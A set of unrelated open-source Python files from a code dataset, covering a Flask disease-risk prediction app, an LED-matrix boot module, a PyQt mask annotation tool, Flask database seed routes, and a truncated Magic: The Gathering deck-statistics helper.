User.query.filter_by(id=user_id).first()\n return user\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return get_user(user_id)\n\n\n@main.route('/login')\ndef login():\n return render_template('security/login_user.html')\n\n\n@main.route('/sign-in', methods=['POST', 'GET'])\ndef login_post():\n email = request.form.get('email')\n password = request.form.get('password')\n # remember_me = True if request.form.get('remember') else False\n user = User.query.filter_by(email=email).first()\n if user and user.verify_password(password) and user.active==1:\n login_user(user)\n flash(f\"Hi {user.username}!\", \"success\")\n if user.roles[0].name.__eq__(\"patient\"):\n return redirect(url_for('patient.pat_dash'))\n if user.roles[0].name.__eq__(\"admin\"):\n return redirect(url_for('admin.admin_dash'))\n if user.roles[0].name.__eq__(\"doctor\"):\n return redirect(url_for('doctor.doc_dash'))\n else:\n flash(\"Error! Recreate your account, please\")\n return \"NO DEFINED ROLE\"\n\n flash(\"Invalid Password/ Email. Please Try Again!\")\n return render_template(\"security/login_user.html\")\n\n\n@main.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@main.route('/about')\ndef about():\n return render_template(\"about.html\")\n\n\n@main.route('/help')\ndef help():\n return render_template(\"help.html\")\n\n\n@main.route('/terms')\ndef terms():\n return render_template(\"tc.html\")\n\n\n@main.route(\"/home\")\n@login_required\ndef home():\n return f\"{current_user.username}. 
Your email is {current_user.email}\"\n\n\n@main.errorhandler(404)\ndef page_not_found(e):\n    # note that we set the 404 status explicitly\n    return render_template('404.html'), 404\n\n\n@main.errorhandler(500)\ndef internal_server_error(e):\n    # note that we set the 500 status explicitly\n    return render_template('500.html'), 500\n\n\n@main.route(\"/add_phone_number\")\n@login_required\ndef add_phone():\n    return render_template(\"/security/add_phone.html\")\n\n\n@main.route(\"/update_phone\", methods=[\"GET\", \"POST\"])\n@login_required\ndef update_phone():\n    if request.method == \"POST\":\n        phone_number = request.form[\"phone_number\"]\n        # user = User.query.filter_by(email=current_user.email).first()\n        user_updated = User.query.filter_by(id=current_user.id).update(dict(phone=phone_number))\n        db.session.commit()\n        return redirect(\"/home\")\n\n\n@main.route(\"/dashboard\")\n@login_required\ndef dashboard():\n    return render_template(\"diseases/dashboard.html\")\n\n\n@main.route(\"/disindex\")\ndef disindex():\n    return render_template(\"diseases/disindex.html\")\n\n\n@main.route(\"/cancer\")\n@login_required\ndef cancer():\n    return render_template(\"diseases/cancer.html\")\n\n\n@main.route(\"/diabetes\")\n@login_required\ndef diabetes():\n    return render_template(\"diseases/diabetes.html\")\n\n\n@main.route(\"/heart\")\n@login_required\ndef heart():\n    return render_template(\"diseases/heart.html\")\n\n\n@main.route(\"/kidney\")\n@login_required\ndef kidney():\n    return render_template(\"diseases/kidney.html\")\n\n\ndef ValuePredictor(to_predict_list, size):\n    to_predict = np.array(to_predict_list).reshape(1, size)\n    if size == 7:\n        loaded_model = joblib.load('kidney_model.pkl')\n        result = loaded_model.predict(to_predict)\n    return result[0]\n\n\n@main.route(\"/predictkidney\", methods=['GET', 'POST'])\ndef predictkidney():\n    if request.method == \"POST\":\n        to_predict_list = request.form.to_dict()\n        to_predict_list = list(to_predict_list.values())\n        to_predict_list = list(map(float, to_predict_list))\n        if len(to_predict_list) == 7:\n            result = ValuePredictor(to_predict_list, 7)\n        if (int(result) == 1):\n            prediction = \"Patient has a high risk of Kidney Disease, please consult your doctor immediately\"\n        else:\n            prediction = \"Patient has a low risk of Kidney Disease\"\n        return render_template(\"diseases/kidney_result.html\", prediction_text=prediction)\n\n\n@main.route(\"/liver\")\n@login_required\ndef liver():\n    return render_template(\"diseases/liver.html\")\n\n\ndef ValuePred(to_predict_list, size):\n    to_predict = np.array(to_predict_list).reshape(1, size)\n    if (size == 7):\n        loaded_model = joblib.load('liver_model.pkl')\n        result = loaded_model.predict(to_predict)\n    return result[0]\n\n\n@main.route('/predictliver', methods=[\"POST\"])\ndef predictliver():\n    if request.method == \"POST\":\n        to_predict_list = request.form.to_dict()\n        to_predict_list = list(to_predict_list.values())\n        to_predict_list = list(map(float, to_predict_list))\n        if len(to_predict_list) == 7:\n            result = ValuePred(to_predict_list, 7)\n\n        if int(result) == 1:\n            prediction = \"Patient has a high risk of Liver Disease, please consult your doctor immediately\"\n        else:\n            prediction = \"Patient has a low risk of Liver Disease\"\n        return render_template(\"diseases/liver_result.html\", prediction_text=prediction)\n\n\n@main.route('/logout')\n@login_required\ndef logout():\n    logout_user()\n    # send the user back to the login page\n    return redirect(url_for('main.login'))\n\n\n@main.route('/predict', methods=['POST'])\ndef predict():\n    input_features = [int(x) for x in 
request.form.values()]\n features_value = [np.array(input_features)]\n features_name = ['clump_thickness', 'uniform_cell_size', 'uniform_cell_shape', 'marginal_adhesion',\n 'single_epithelial_size', 'bare_nuclei', 'bland_chromatin', 'normal_nucleoli', 'mitoses']\n df = pd.DataFrame(features_value, columns=features_name)\n output = model.predict(df)\n if output == 4:\n res_val = \"a high risk of Breast Cancer\"\n else:\n res_val = \"a low risk of Breast Cancer\"\n\n return render_template('diseases/cancer_result.html', prediction_text=f'Patient has {res_val}')\n\n\n##################################################################################\n\ndf1 = pd.read_csv('diabetes.csv')\n\n# Renaming DiabetesPedigreeFunction as DPF\ndf1 = df1.rename(columns={'DiabetesPedigreeFunction': 'DPF'})\n\n# Replacing the 0 values from ['Glucose','BloodPressure','SkinThickness','Insulin','BMI'] by NaN\ndf_copy = df1.copy(deep=True)\ndf_copy[['Glucose', 'BloodPressure', 'SkinThickness', 'Insulin', 'BMI']] = df_copy[['Glucose', 'BloodPressure',\n 'SkinThickness', 'Insulin',\n 'BMI']].replace(0, np.NaN)\n\n# Replacing NaN value by mean, median depending upon distribution\ndf_copy['Glucose'].fillna(df_copy['Glucose'].mean(), inplace=True)\ndf_copy['BloodPressure'].fillna(df_copy['BloodPressure'].mean(), inplace=True)\ndf_copy['SkinThickness'].fillna(df_copy['SkinThickness'].median(), inplace=True)\ndf_copy['Insulin'].fillna(df_copy['Insulin'].median(), inplace=True)\ndf_copy['BMI'].fillna(df_copy['BMI'].median(), inplace=True)\n\n# Model Building\n\nX = df1.drop(columns='Outcome')\ny = df1['Outcome']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, random_state=0)\n\n# Creating Random Forest Model\n\nclassifier = RandomForestClassifier(n_estimators=20)\nclassifier.fit(X_train, y_train)\n\n# Creating a pickle file for the classifier\nfilename = 'diabetes-prediction-rfc-model.pkl'\npickle.dump(classifier, open(filename, 'wb'))\n\n\n#####################################################################\n\n\n@main.route('/predictt', methods=['POST'])\ndef predictt():\n if request.method == 'POST':\n preg = request.form['pregnancies']\n glucose = request.form['glucose']\n bp = request.form['bloodpressure']\n st = request.form['skinthickness']\n insulin = request.form['insulin']\n bmi = request.form['bmi']\n dpf = request.form['dpf']\n age = request.form['age']\n\n data = np.array([[preg, glucose, bp, st, insulin, bmi, dpf, age]])\n my_prediction = classifier.predict(data)\n\n return render_template('diseases/diab_result.html', prediction=my_prediction)\n\n\n############################################################################################################\n\n@main.route('/predictheart', methods=['POST'])\ndef predictheart():\n input_features = [float(x) for x in request.form.values()]\n features_value = [np.array(input_features)]\n\n features_name = [\"age\", \"trestbps\", \"chol\", \"thalach\", \"oldpeak\", \"sex_0\",\n \" sex_1\", \"cp_0\", \"cp_1\", \"cp_2\", \"cp_3\", \" fbs_0\",\n \"restecg_0\", \"restecg_1\", \"restecg_2\", \"exang_0\", \"exang_1\",\n \"slope_0\", \"slope_1\", \"slope_2\", \"ca_0\", \"ca_1\", \"ca_2\", \"thal_1\",\n \"thal_2\", \"thal_3\"]\n\n df = pd.DataFrame(features_value, columns=features_name)\n output = model1.predict(df)\n\n if output == 1:\n res_val = \"a high risk of Heart Disease\"\n else:\n res_val = \"a low risk of Heart Disease\"\n\n return render_template('diseases/heart_result.html', prediction_text='Patient has 
{}'.format(res_val))\n","repo_name":"samuelfaindani/diesease-diagnosis","sub_path":"med-app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73276972268","text":"import time\nfrom submodule import Submodule\nimport settings\nfrom rgbmatrix import graphics\nfrom PIL import Image, ImageSequence\n\n\nclass BootService(Submodule):\n\n def __init__(self, add_loop, rmv_loop, add_event):\n super().__init__(add_loop, rmv_loop, add_event)\n\n add_event(1, self.display_boot_animation)\n add_event(1, self.display_boot_info)\n\n def display_boot_animation(self, matrix):\n try:\n image = Image.open(settings.IMAGES_PATH + 'boot2.gif')\n except FileNotFoundError:\n print('Boot Animation not found')\n return\n\n for frame in range(0, image.n_frames):\n image.seek(frame)\n temp = image.copy()\n temp = temp.resize((64, 32))\n matrix.SetImage(temp.convert('RGB'), unsafe=False)\n\n time.sleep(0.025)\n\n matrix.Clear()\n\n def display_boot_info(self, matrix):\n swap = matrix.CreateFrameCanvas()\n\n fontBold = graphics.Font()\n fontBold.LoadFont(settings.FONT_PATH + \"6x13B.bdf\")\n font = graphics.Font()\n font.LoadFont(settings.FONT_PATH + \"5x8.bdf\")\n header_color = graphics.Color(0, 180, 20)\n text_color = graphics.Color(100, 0, 100)\n number_color = graphics.Color(100, 100, 100)\n\n graphics.DrawText(swap, fontBold, 5, fontBold.baseline - 2, header_color, \"Boot Info\")\n graphics.DrawText(swap, font, 1, font.baseline + 13, text_color, \"Modules:\")\n graphics.DrawText(swap, font, 54, font.baseline + 13, number_color, str(settings.LOADED_MODULES))\n graphics.DrawText(swap, font, 1, font.baseline + 22, text_color, \"Services:\")\n graphics.DrawText(swap, font, 54, font.baseline + 22, number_color, str(settings.RUNNING_SERVICES))\n\n matrix.SwapOnVSync(swap)\n\n time.sleep(5)\n\n","repo_name":"brokelyn/rpi-led-matrix-scheduler","sub_path":"submodules/boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"3433715941","text":"\"\"\"\nThis code is written by Ridvan Salih KUZU @DLR\nABOUT SCRIPT:\nThis script implements all user interface functionalities\n\n\"\"\"\nimport sys\nimport glob\nimport shutil\nimport json\nfrom PyQt5 import QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QMessageBox\nfrom ui.gui import Ui_MainWindow\nfrom PyQt5.QtCore import pyqtSlot\nimport threading\nimport albumentations as A\nfrom general.custom_data_generator import InstanceGenerator\nfrom PIL import Image\nimport numpy as np\nfrom tensorflow.keras.models import load_model\nimport tensorflow as tf\nfrom general.post_processing import threshold_mask, post_processing #,binary_opening_closing\nfrom PIL.ImageQt import ImageQt\nimport pandas as pd\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=RuntimeWarning)\nimport logging\nimport os\nlogging.disable(logging.WARNING)\n\n\n\nclass MyForm(QtWidgets.QMainWindow):\n\n def __init__(self, parent=None):\n QtWidgets.QWidget.__init__(self, parent)\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\n self.ui._button_input_dir.clicked.connect(self.push_input_on_click)\n self.ui._button_output_dir.clicked.connect(self.push_output_on_click)\n self.ui._button_model_dir.clicked.connect(self.push_model_on_click)\n self.ui._button_start.clicked.connect(self.push_start_on_click)\n\n 
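        # Wire the evaluation buttons, save/overwrite actions, post-processing sliders, file combo box and view toggles to their handlers.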
self.ui._button_good.clicked.connect(self.push_good_on_click)\n        self.ui._button_moderate.clicked.connect(self.push_moderate_on_click)\n        self.ui._button_bad.clicked.connect(self.push_bad_on_click)\n        self.ui._button_save.clicked.connect(self.save_on_click)\n        self.ui._button_overwrite.clicked.connect(self.overwrite_on_click)\n\n        self.ui._slider_smooth.sliderReleased.connect(self.slider_value_changed_event)\n        self.ui._slider_remove_hole.sliderReleased.connect(self.slider_value_changed_event)\n\n        self.ui._combo_box.activated.connect(self.combo_value_changed_event)\n\n        self.ui._rb_contour_view.clicked.connect(self.predicted_display_changed_event)\n        self.ui._rb_mask_view.clicked.connect(self.predicted_display_changed_event)\n\n        self.log_path=os.path.dirname(os.path.realpath(__file__))+os.sep+'log.json'\n        self.process_info = {}\n        self.is_warm_up=False\n\n\n    def init_at_warm_up(self):\n        self.is_warm_up=True\n        self._out_dir_dict = {}\n        self._temp_input = None\n        self._temp_mask_raw = None\n        self._temp_mask_processed = None\n        self._temp_overlap=None\n        self._temp_contour_processed = None\n\n        self._model = None\n\n        self.GLOBAL_COUNTER = 0\n        self.FILE_NUMBER = 0\n        self.pd_input_table = pd.DataFrame(columns=[\"disp_file\",\"in_file\",\"temp_file\", \"mask_file\",\"contour_file\", \"dest_im_file\", \"dest_mask_file\",\"dest_contour_file\"])\n\n    @pyqtSlot()\n    def push_input_on_click(self):\n        in_dir = QtWidgets.QFileDialog.getExistingDirectory(None, 'Select input folder including BMP images:', 'F:\\\\',QtWidgets.QFileDialog.ShowDirsOnly)\n        self.ui._line_input_dir.setText(in_dir)\n\n    @pyqtSlot()\n    def predicted_display_changed_event(self):\n        self.display_next()\n\n\n    @pyqtSlot()\n    def push_output_on_click(self):\n        out_dir = QtWidgets.QFileDialog.getExistingDirectory(None, 'Select output folder for generated masks:', 'F:\\\\',QtWidgets.QFileDialog.ShowDirsOnly)\n        self.ui._line_output_dir.setText(out_dir)\n\n    @pyqtSlot()\n    def push_model_on_click(self):\n        model_dir = QtWidgets.QFileDialog.getExistingDirectory(None, 'Select Tensorflow model for predictions:', 'F:\\\\',QtWidgets.QFileDialog.ShowDirsOnly)\n        self.ui._line_model_dir.setText(model_dir)\n\n    @pyqtSlot()\n    def push_start_on_click(self):\n        # pass the method itself as the target so the preparation runs on the worker thread\n        threading.Thread(target=self.prepare_start).start()\n\n\n    @pyqtSlot()\n    def push_good_on_click(self):\n        self.evaluate_next('good')\n\n    @pyqtSlot()\n    def push_moderate_on_click(self):\n        self.evaluate_next('moderate')\n\n    @pyqtSlot()\n    def push_bad_on_click(self):\n        self.evaluate_next('bad')\n\n    @pyqtSlot()\n    def save_on_click(self):\n        self.move_to_selected_folder(False)\n\n    @pyqtSlot()\n    def overwrite_on_click(self):\n        self.move_to_selected_folder(True)\n\n    @pyqtSlot()\n    def slider_value_changed_event(self):\n        try:\n            post_processing(self._temp_input, self._temp_mask_raw, self._temp_overlap, self._temp_mask_processed, self._temp_contour_processed,\n                            self.ui._slider_remove_hole.value(), self.ui._slider_smooth.value())\n        except Exception as e:\n            print(e)\n        self.display_next()\n\n    @pyqtSlot()\n    def combo_value_changed_event(self):\n        try:\n            self.GLOBAL_COUNTER = self.ui._combo_box.currentIndex() - 1\n            self.evaluate_next()\n\n        except Exception as e:\n            print(e)\n        self.display_next()\n\n\n\n    def evaluate_next(self, evaluation=None):\n        if not self.is_warm_up:\n            message = \"Please Start Process First!!\"\n            QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n\n        self.ui._slider_remove_hole.setValue(0)\n        self.ui._slider_smooth.setValue(0)\n        if evaluation is not None:\n            self.assign_to_selected_folder(evaluation)\n        self.update_progress()\n        is_ongoing=self.predict_next()\n        if is_ongoing: self.display_next()\n\n    def prepare_start(self):\n        print(\"\\n\\n\\nPREPARATION OF THE SYSTEM MAY TAKE SOME MINUTES ON CPU MACHINES..\\n\\n\\n\")\n        self.warmup_system()\n        self.predict_next()\n        self.display_next()\n\n    def warmup_system(self):\n        self.init_at_warm_up()\n        in_dir = os.path.abspath(self.ui._line_input_dir.text())\n        if not os.path.exists(in_dir):\n            message = \"Input Folder \\\"{}\\\" is NOT found!!\".format(in_dir)\n            QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n\n        else:\n            for idx, file in enumerate(glob.glob(in_dir + os.sep + \"*.bmp\")):\n                self.pd_input_table.loc[idx] = [os.path.basename(file),file, None, None, None,None,None,None]\n                self.ui._combo_box.addItem(os.path.basename(file))\n\n            self.FILE_NUMBER = len(glob.glob(in_dir + os.sep + \"*.bmp\"))\n\n        out_dir = os.path.abspath(self.ui._line_output_dir.text())\n        if not os.path.exists(out_dir):\n            message = \"The output folder is NOT found. \\nCan we create it for you?\"\n            reply=QMessageBox.information(self, 'INFORMATION', message, QMessageBox.Yes, QMessageBox.No)\n            if reply ==QMessageBox.Yes:\n                try:\n                    os.makedirs(out_dir)\n                except OSError as e:\n                    print(e)\n                    message = \"The output folder cannot be created. \\n Please check the application permissions.\"\n                    QMessageBox.warning(self, 'WARNING',message, QMessageBox.Ok)\n            else:\n                return\n\n        self.create_subfolders()\n\n        if self.FILE_NUMBER==0:\n            message = \"The input folder is empty. \\nPlease select a folder including BMP images.\"\n            QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n        else:\n            try:\n                self._model = load_model(os.path.abspath(self.ui._line_model_dir.text()),compile=False)\n            except Exception as e:\n                print(e)\n                message = \"The model file is not found. 
\\nPlease select a folder including a TF model.\"\n QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n\n def create_subfolders(self, overwrite=False):\n out_dir = self.ui._line_output_dir.text()\n out_dir = os.path.abspath(out_dir)\n\n try:\n self._out_dir_dict['good']={}\n self._out_dir_dict['moderate']={}\n self._out_dir_dict['bad'] = {}\n self._out_dir_dict['peak_detection'] = {}\n\n self._out_dir_dict['good']['image'] = out_dir + os.sep + 'good'+os.sep +'image'+os.sep\n self._out_dir_dict['good']['mask'] = out_dir + os.sep +'good'+ os.sep +'mask'+os.sep\n self._out_dir_dict['good']['contour'] = out_dir + os.sep + 'good' + os.sep + 'contour' + os.sep\n\n self._out_dir_dict['moderate']['image'] = out_dir + os.sep +'moderate'+ os.sep +'image'+os.sep\n self._out_dir_dict['moderate']['mask'] = out_dir + os.sep +'moderate'+ os.sep +'mask'+os.sep\n self._out_dir_dict['moderate']['contour'] = out_dir + os.sep + 'moderate' + os.sep + 'contour' + os.sep\n\n self._out_dir_dict['bad']['image'] = out_dir + os.sep +'bad'+ os.sep +'image'+os.sep\n self._out_dir_dict['bad'] ['mask']= out_dir + os.sep +'bad'+ os.sep +'mask'+os.sep\n self._out_dir_dict['bad']['contour'] = out_dir + os.sep + 'bad' + os.sep + 'contour' + os.sep\n\n self._out_dir_dict['peak_detection']['image'] = out_dir + os.sep +'peak_detection'+ os.sep +'image'+os.sep\n self._out_dir_dict['peak_detection']['mask'] = out_dir + os.sep +'peak_detection'+ os.sep +'mask'+os.sep\n self._out_dir_dict['peak_detection']['contour'] = out_dir + os.sep + 'peak_detection' + os.sep + 'contour' + os.sep\n\n self._out_dir_dict['peak_detection']['peak_detection'] = out_dir + os.sep +'peak_detection'+os.sep\n\n for key,subdir in self._out_dir_dict.items():\n for subsubdir in subdir.values():\n if not os.path.exists(subsubdir):\n os.makedirs(subsubdir)\n elif overwrite and key != 'peak_detection':\n shutil.rmtree(subsubdir)\n os.makedirs(subsubdir)\n\n except OSError as e:\n print(e)\n message = \"The output folder is protected. 
\\n Please check the application permissions.\"\n QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n\n def predict_next(self):\n try:\n if self.GLOBAL_COUNTER < self.FILE_NUMBER:\n INPUT_SHAPE = [512, 512, 3]\n OUTPUT_SHAPE = [512, 512, 1]\n\n TEST_TRANSFORMATION = A.Compose([\n A.Resize(INPUT_SHAPE[0], INPUT_SHAPE[1]),\n A.Normalize(mean=0, std=0.5),\n ])\n\n in_file_name = self.pd_input_table.iloc[self.GLOBAL_COUNTER]['in_file']\n image, input_source, _ = next(InstanceGenerator(TEST_TRANSFORMATION, in_file_name).__iter__())\n\n\n\n pred_mask = self._model.predict(image).squeeze()\n pred_mask = threshold_mask(pred_mask)\n #pred_mask=binary_opening_closing(pred_mask)\n pred_mask=Image.fromarray((pred_mask * 255).astype(np.uint8))\n\n self._temp_input = self._out_dir_dict['peak_detection']['image'] + os.path.basename(input_source)\n self._temp_mask_raw = self._out_dir_dict['peak_detection']['mask'] + os.path.basename(input_source).replace('.bmp', '_raw_mask.bmp')\n self._temp_overlap = self._out_dir_dict['peak_detection']['mask'] + os.path.basename(input_source).replace('.bmp', '_overlap.bmp')\n self._temp_mask_processed = self._out_dir_dict['peak_detection']['mask'] + os.path.basename(input_source).replace('.bmp','_mask.bmp')\n self._temp_contour_processed = self._out_dir_dict['peak_detection']['contour'] + os.path.basename(input_source).replace('.bmp', '_contour.bmp')\n\n try:\n shutil.copy(input_source,self._temp_input)\n except shutil.SameFileError:\n pass\n pred_mask.save(self._temp_mask_raw)\n post_processing(self._temp_input, self._temp_mask_raw, self._temp_overlap, self._temp_mask_processed, self._temp_contour_processed,\n self.ui._slider_remove_hole.value(), self.ui._slider_smooth.value())\n return True\n else:\n\n self.GLOBAL_COUNTER = 0\n message = \"The process is complete. \\nYou can start another process.\"\n reply = QMessageBox.information(self, 'INFORMATION', message, QMessageBox.Ok)\n return False\n\n except Exception as e:\n print(e)\n message = \"An Error occured. \\n {}\".format(e.__str__())\n QMessageBox.critical(self, 'ERROR', message, QMessageBox.Ok)\n\n\n\n def display_next(self):\n try:\n if self.ui._rb_mask_view.isChecked():\n temp_predicted=self._temp_mask_processed\n elif self.ui._rb_contour_view.isChecked():\n temp_predicted = self._temp_contour_processed\n\n\n\n q_image = ImageQt(Image.open(self._temp_overlap)).copy()\n q_mask = ImageQt(Image.open(temp_predicted)).copy()\n\n pix = QtGui.QPixmap.fromImage(q_image)\n mix = QtGui.QPixmap.fromImage(q_mask)\n\n self.ui._label_input_image.setPixmap(pix)\n self.ui._label_input_image.adjustSize()\n self.ui._label_predicted_mask.setPixmap(mix)\n self.ui._label_predicted_mask.adjustSize()\n\n self.ui._label_input_name.setText(os.path.basename(self._temp_input))\n self.ui._label_mask_name.setText(os.path.basename(temp_predicted))\n except Exception as e:\n print(e)\n #message = \"An error occured. 
\\n {}\".format(e.__str__())\n #QMessageBox.critical(self, 'ERROR', message, QMessageBox.Ok)\n return\n\n def assign_to_selected_folder(self, selected_dir):\n try:\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['temp_file'] = self._temp_input\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['mask_file'] = self._temp_mask_processed\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['contour_file'] = self._temp_contour_processed\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['dest_im_file'] = self._out_dir_dict[selected_dir]['image'] + os.path.basename(self._temp_input)\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['dest_mask_file'] = self._out_dir_dict[selected_dir]['mask'] + os.path.basename(self._temp_mask_processed)\n self.pd_input_table.iloc[self.GLOBAL_COUNTER]['dest_contour_file'] = self._out_dir_dict[selected_dir]['contour'] + os.path.basename(self._temp_contour_processed)\n except Exception as e:\n print(e)\n # message = \"An Error occured. \\n {}\".format(e.__str__())\n # QMessageBox.critical(self, 'ERROR', message, QMessageBox.Ok)\n return\n\n def move_to_selected_folder(self, overwrite):\n try:\n if not self.is_warm_up:\n message = \"Please Start the Process First!!\"\n QMessageBox.warning(self, 'WARNING', message, QMessageBox.Ok)\n\n if overwrite:\n self.create_subfolders(overwrite=True)\n for idx, row_items in self.pd_input_table.iterrows():\n if row_items['dest_im_file'] is not None:\n try:\n shutil.copy(row_items['temp_file'], row_items['dest_im_file'])\n except shutil.SameFileError:\n pass\n try:\n shutil.copy(row_items['mask_file'], row_items['dest_mask_file'])\n except shutil.SameFileError:\n pass\n try:\n shutil.copy(row_items['contour_file'], row_items['dest_contour_file'])\n except shutil.SameFileError:\n pass\n\n message = \"The evaluated files are saved.\"\n reply = QMessageBox.information(self, 'INFORMATION', message, QMessageBox.Ok)\n except Exception as e:\n print(e)\n #message = \"An Error occured. 
\\n {}\".format(e.__str__())\n #QMessageBox.critical(self, 'ERROR', message, QMessageBox.Ok)\n return\n\n\n def update_progress(self):\n self.GLOBAL_COUNTER += 1\n percentage = int(100 * self.GLOBAL_COUNTER/self.FILE_NUMBER)\n self.ui._progress_bar.setValue(percentage)\n self.ui._label_progress.setText('{} of {} files completed!'.format(self.GLOBAL_COUNTER,self.FILE_NUMBER))\n\n def prepare_closing(self):\n self.process_info['input_dir'] = self.ui._line_input_dir.text()\n self.process_info['output_dir'] = self.ui._line_output_dir.text()\n self.process_info['model_dir'] = self.ui._line_model_dir.text()\n with open(self.log_path, 'w') as outfile:\n json.dump(self.process_info, outfile)\n shutil.rmtree(self._out_dir_dict['peak_detection']['peak_detection'])\n\n def prepare_opening(self):\n if os.path.exists(self.log_path):\n with open(self.log_path, 'r') as readfile:\n self.process_info = json.load(readfile)\n self.ui._line_input_dir.setText(self.process_info['input_dir'])\n self.ui._line_output_dir.setText(self.process_info['output_dir'])\n self.ui._line_model_dir.setText(self.process_info['model_dir'])\n\n\nif __name__ == \"__main__\":\n try:\n app = QtWidgets.QApplication(sys.argv)\n myapp = MyForm()\n myapp.prepare_opening()\n myapp.show()\n ret=app.exec_()\n myapp.prepare_closing()\n sys.exit(ret)\n except Exception as e:\n print(e)\n","repo_name":"ridvansalihkuzu/butterflynet","sub_path":"ui/annotation_window.py","file_name":"annotation_window.py","file_ext":"py","file_size_in_byte":17386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73709806188","text":"from flask import Blueprint\nfrom flask_login import login_required\nfrom app.models import db, Product, ItemType, Purchase\nfrom app.seeds.products import products\nfrom app.seeds.item_types import item_types\nfrom app.seeds.purchases import product_purchases\n\nseed_routes = Blueprint('seed', __name__)\n\n\n@seed_routes.route('/seed_products')\n@login_required\ndef seed_products():\n for product in products:\n db.session.add(Product(**product))\n db.session.commit()\n return {'message': 'Products seeded'}\n\n\n@seed_routes.route('/undo_products')\n@login_required\ndef undo_products():\n for product in Product.query.all():\n db.session.delete(product)\n db.session.commit()\n return {'message': 'Products undone'}\n\n\n@seed_routes.route('/seed_types')\n@login_required\ndef seed_types():\n for item_type in item_types:\n type = ItemType(**item_type)\n print(type.to_dict())\n db.session.add(type)\n db.session.commit()\n return {'message': 'Types seeded'}\n\n\n@seed_routes.route('/undo_types')\n@login_required\ndef undo_types():\n for item_type in ItemType.query.all():\n db.session.delete(item_type)\n db.session.commit()\n return {'message': 'Types undone'}\n\n\n@seed_routes.route('/seed_purchases')\n@login_required\ndef seed_purchases():\n for purchase in product_purchases:\n db.session.add(Purchase(**purchase))\n db.session.commit()\n return {'message': 'Purchases seeded'}\n\n\n@seed_routes.route('/undo_purchases')\n@login_required\ndef undo_purchases():\n for purchase in Purchase.query.all():\n db.session.delete(purchase)\n db.session.commit()\n return {'message': 'Purchases undone'}\n\n\n@seed_routes.route('/hello')\ndef hello():\n return {'message': 'Hello 
World'}\n","repo_name":"Drewthurm21/washSealCalc","sub_path":"app/api/seed_routes.py","file_name":"seed_routes.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27053537953","text":"import src.pricing_info as pricing_info\n\ndef get_deck_stats(deck, pricing_data=None):\n deck_stats = {\"commander\": 1}\n basic_lands = {}\n\n for k, v in deck[\"the_99\"].items():\n if k == \"basic_lands\":\n for card in v:\n if card[\"name\"] not in basic_lands.keys():\n basic_lands[card[\"name\"]] = 1\n else:\n basic_lands[card[\"name\"]] += 1\n deck_stats[\"basic_lands\"] = sum(basic_lands.values())\n\n elif len(v) != 0:\n deck_stats[k] = len(v)\n\n if pricing_data != None:\n deck_stats[\"deck_value\"] = pricing_info.get_valuation_of_deck(deck, pricing_data)\n else:\n deck_stats[\"deck_value\"] = None\n\n return deck_stats\n\ndef print_deck_stats(deck, pricing_data = None):\n deck_stats = get_deck_stats(deck, pricing_data=pricing_data)\n deck_value = deck_stats.pop('deck_value')\n\n print(f\"Deck Name: {deck['name']}, Commander: {deck['commander']['name']}\")\n print(f\"Deck Theme: {deck['theme']}\")\n\n for k, v in deck_stats.items():\n print(f\"\\t{k}: {v}\")\n\n print(f\"Total Cards in deck: {sum(deck_stats.values())}\")\n if deck_value != None:\n print(f\"Total Deck Value: ${deck_value}\")\n\ndef dedupe_basic_lands(basic_lands):\n new_basic_lands = {}\n\n # {\"name\": \"\", \"setCode\": \"\", \"setNumber\": \"\", \"treatment\": \"\", \"num_of_treatment\": 1, \"num_in_use\": 0}\n\n for card in basic_lands:\n combined_name = f\"{card['name']}:{card['setCode']}:{card['setNumber']}:{card['treatment']}\"\n if combined_name not in new_basic_lands.keys():\n new_basic_lands[combined_name] = card\n\n else:\n new_basic_lands[combined_name]['num_of_treatment'] += card['num_of_treatment']\n new_basic_lands[combined_name]['num_in_use'] += card['num_in_use']\n\n return list(new_basic_lands.values())\n\ndef convert_deck_to_csv_format(deck):\n # this can be used to convert a deck list to the csv format\n # used to add to the collection database. 
primarily used if\n # the decklist cards aren't already accounted for in the database\n # i.e you create the decklist first before having the cards in the\n # database\n cards_to_convert = []\n\n f = {\"name\": \"\", \"setCode\": \"\", \"setNumber\": \"\", \"treatment\": \"\", \"num_of_treatment\": 1, \"num_in_use\": 0}\n if deck[\"deck_in_use\"]:\n f[\"num_in_use\"] = 1\n\n # add commander\n f[\"name\"] = deck[\"commander\"][\"name\"]\n f[\"setCode\"] = deck[\"commander\"][\"setCode\"]\n f[\"treatment\"] = deck[\"commander\"][\"treatment\"]\n f[\"setNumber\"] = deck[\"commander\"][\"setNumber\"]\n\n cards_to_convert.append(f)\n\n for card_type, cards in deck[\"the_99\"].items():\n if card_type != \"basic_lands\" and len(cards) > 0:\n for card in cards:\n f = {\"name\": \"\", \"setCode\": \"\", \"setNumber\": \"\", \"treatment\": \"\", \"num_of_treatment\": 1, \"num_in_use\": 0}\n if deck[\"deck_in_use\"]:\n f[\"num_in_use\"] = 1\n f[\"name\"] = card[\"name\"]\n f[\"setCode\"] = card[\"setCode\"]\n f[\"treatment\"] = card[\"treatment\"]\n f[\"setNumber\"] = 